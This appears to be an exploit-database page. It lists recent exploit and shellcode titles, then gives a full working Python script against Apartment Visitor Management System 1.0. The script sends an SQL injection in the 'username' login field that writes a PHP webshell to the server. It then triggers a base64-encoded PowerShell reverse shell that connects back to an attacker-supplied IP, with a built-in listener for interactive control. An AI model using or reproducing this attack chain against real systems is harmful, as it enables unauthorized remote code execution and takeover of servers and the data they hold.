
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
77 lines
No EOL
3.2 KiB
Python
Executable file
77 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
|
|
# Date: 2021-08-13
|
|
# Exploit Author: mari0x00
|
|
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
|
|
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
|
|
# Version: 1.0
|
|
# Tested on: Windows 10 + XAMPP
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import requests, socket, threading
|
|
import base64, time, sys
|
|
|
|
print(('''###########################################################''',"red"))
|
|
print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
|
|
print(('''###########################################################''',"red"))
|
|
print("")
|
|
|
|
URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
|
|
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
|
|
path = path.replace("\\", "\\\\")
|
|
rhost = input("Provide attacker IP: ") or "127.0.0.1"
|
|
rport = input("Provide attacker listening port: ") or "1337"
|
|
|
|
|
|
# sending webshell
|
|
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
|
|
requests.post(URL, data=payload)
|
|
|
|
|
|
def shell(rhost, rport):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
s.bind((rhost, int(rport)))
|
|
except socket.error as msg:
|
|
print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
|
|
sys.exit()
|
|
|
|
s.settimeout(5)
|
|
s.listen(5)
|
|
print('[+] Waiting for connection..')
|
|
|
|
conn = False
|
|
command=''
|
|
|
|
while conn == False:
|
|
try:
|
|
conn, addr = s.accept()
|
|
print("Got a connection from " + addr[0] + ":" + str(addr[1]))
|
|
conn.send('\n'.encode())
|
|
time.sleep(1)
|
|
print(conn.recv(0x10000).decode())
|
|
while(command != 'exit'):
|
|
command=input('')
|
|
conn.send((command + '\n').encode())
|
|
time.sleep(.3)
|
|
res = conn.recv(0x10000)
|
|
print(res.decode())
|
|
s.close()
|
|
sys.exit("[!] Program exited")
|
|
except socket.timeout:
|
|
pass
|
|
|
|
|
|
def start_shell(rhost, rport):
|
|
revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
|
|
revshell = revshell.encode('ascii')
|
|
revshell = base64.b64encode(revshell)
|
|
revshell = revshell.decode('ascii')
|
|
connection = requests.get(URL+"/lol.php?cmd=" + revshell)
|
|
|
|
print("[+] Starting to listen on port " + rport)
|
|
time.sleep(0.5)
|
|
threading.Thread(target=shell, args=(rhost, rport)).start()
|
|
time.sleep(2)
|
|
print("[+] Sending the reverse shell payload")
|
|
threading.Thread(target=start_shell, args=(rhost, rport)).start() |